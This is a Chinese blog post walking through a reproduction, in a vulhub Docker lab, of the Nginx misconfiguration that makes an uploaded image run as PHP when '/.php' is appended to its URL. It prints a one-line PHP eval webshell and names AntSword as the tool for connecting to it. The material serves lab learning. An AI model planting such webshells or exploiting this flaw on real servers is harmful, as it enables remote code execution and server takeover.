Nginx 解析漏洞复现
漏洞环境搭建
- 时间有限,漏洞环境搭建教程简单,在此不再赘述。
具体项目地址:https://github.com/vulhub/vulhub
搭建教程及说明可参考:https://vulhub.org/
-还是挺简单的-
Nginx 解析漏洞复现步骤如下:
- 靶机环境
CentOS7 nginx/1.15.3 PHP Version 7.2.10
由此可知,该漏洞与Nginx、php版本无关,属于用户配置不当造成的解析漏洞。
- 启动环境
[root@localhost ~]# cd vulhub/nginx/nginx_parsing_vulnerability/ [root@localhost nginx_parsing_vulnerability]# systemctl start docker.service [root@localhost nginx_parsing_vulnerability]# docker-compose build [root@localhost nginx_parsing_vulnerability]# docker-compose up -d
- 复现
1). 访问 http://IP/uploadfiles/nginx.png 如下所示:
2). 访问 http://IP/uploadfiles/nginx.png/.php 如下所示:
通过测试可以看出这就是传说中的nginx解析漏洞:在
/nginx.png
后加/.php
会将nginx.png当成php解析
- 利用此解析漏洞拿webshell
一句话:
<?php eval($_POST['zzqsmile'])?>
- 最后要注意的是做完漏洞测试实验后记得移除环境
[root@localhost nginx_parsing_vulnerability]# docker-compose down Stopping nginxparsingvulnerability_nginx_1 ... done Stopping nginxparsingvulnerability_php_1 ... done Removing nginxparsingvulnerability_nginx_1 ... done Removing nginxparsingvulnerability_php_1 ... done Removing network nginxparsingvulnerability_default [root@localhost nginx_parsing_vulnerability]#
在拿webshell时候本来应该很简单,但是开始怎么做菜刀都不能连接成功,后来排错,最后得出可能由于环境问题,菜刀连接不上,不得不用这个之前不知道的蚁剑神器了,弄的我怀疑人生,换个工具一下就连接上,没毛病。
- 中国蚁剑
蚁剑地址:https://github.com/AntSwordProject/antSword/releases
官方加载器:https://github.com/AntSwordProject/AntSword-Loader
低调大师中文资讯倾力打造互联网数据资讯、行业资源、电子商务、移动互联网、网络营销平台。
持续更新报道IT业界、互联网、市场资讯、驱动更新,是最及时权威的产业资讯及硬件资讯报道平台。
转载内容版权归作者及来源网站所有,本站原创内容转载请注明来源。
- 上一篇
Linux学习的回顾总结
Linux的学习也告一阶段了,其实学Linux也单纯是想着体验下使用双系统的感觉,想和在window系统一样日常的使用下Linux系统,所以才去学了些许知识,现在可以在Linux下用idea写Java,用网易云音乐听音乐,使用QQ微信等等基本功能,我的目的也达到了。今天就简单回顾看看之前自己写的几篇文章。 一、学习在VMware安装linux,熟悉些基本命令 二、尝试重装系统和安装双系统 三、福利篇——收集了在linux系统下解决的各种问题的文章链接 ~~~~~~~~~~~~~~~~~~~2018-09-27记录于此
- 下一篇
CentOS 7.2 下安装配置Node.js和Yarn
安装node.js 简单的说 Node.js 就是运行在服务端的 JavaScript。Node.js 是一个基于Chrome JavaScript 运行时建立的一个平台。Node.js是一个事件驱动I/O服务端JavaScript环境,基于Google的V8引擎,V8引擎执行Javascript的速度非常快,性能非常好。 首先更新源node.js的yum源这里我们安装最新V8.x版本 # curl --silent --location https://rpm.nodesource.com/setup_8.x | bash - yum安装node.js # yum install -y nodejs 使用npm国内阿里源 # npm config set registry=https://registry.npm.taobao.org 查看node.js版本 # node -v 安装node.js版本管理器n # npm install -g n 版本管理 // 安装指定版本 # n <version> // 安装稳定版本 # n stable // 安装最新版本 # n...
相关文章
文章评论
共有0条评论来说两句吧...
文章二维码
点击排行
推荐阅读
最新文章
- Hadoop3单机部署,实现最简伪集群
- CentOS8编译安装MySQL8.0.19
- CentOS7编译安装Cmake3.16.3,解决mysql等软件编译问题
- Windows10,CentOS7,CentOS8安装MongoDB4.0.16
- SpringBoot2整合MyBatis,连接MySql数据库做增删改查操作
- SpringBoot2整合Thymeleaf,官方推荐html解决方案
- Eclipse初始化配置,告别卡顿、闪退、编译时间过长
- Springboot2将连接池hikari替换为druid,体验最强大的数据库连接池
- Mario游戏-低调大师作品
- CentOS6,CentOS7官方镜像安装Oracle11G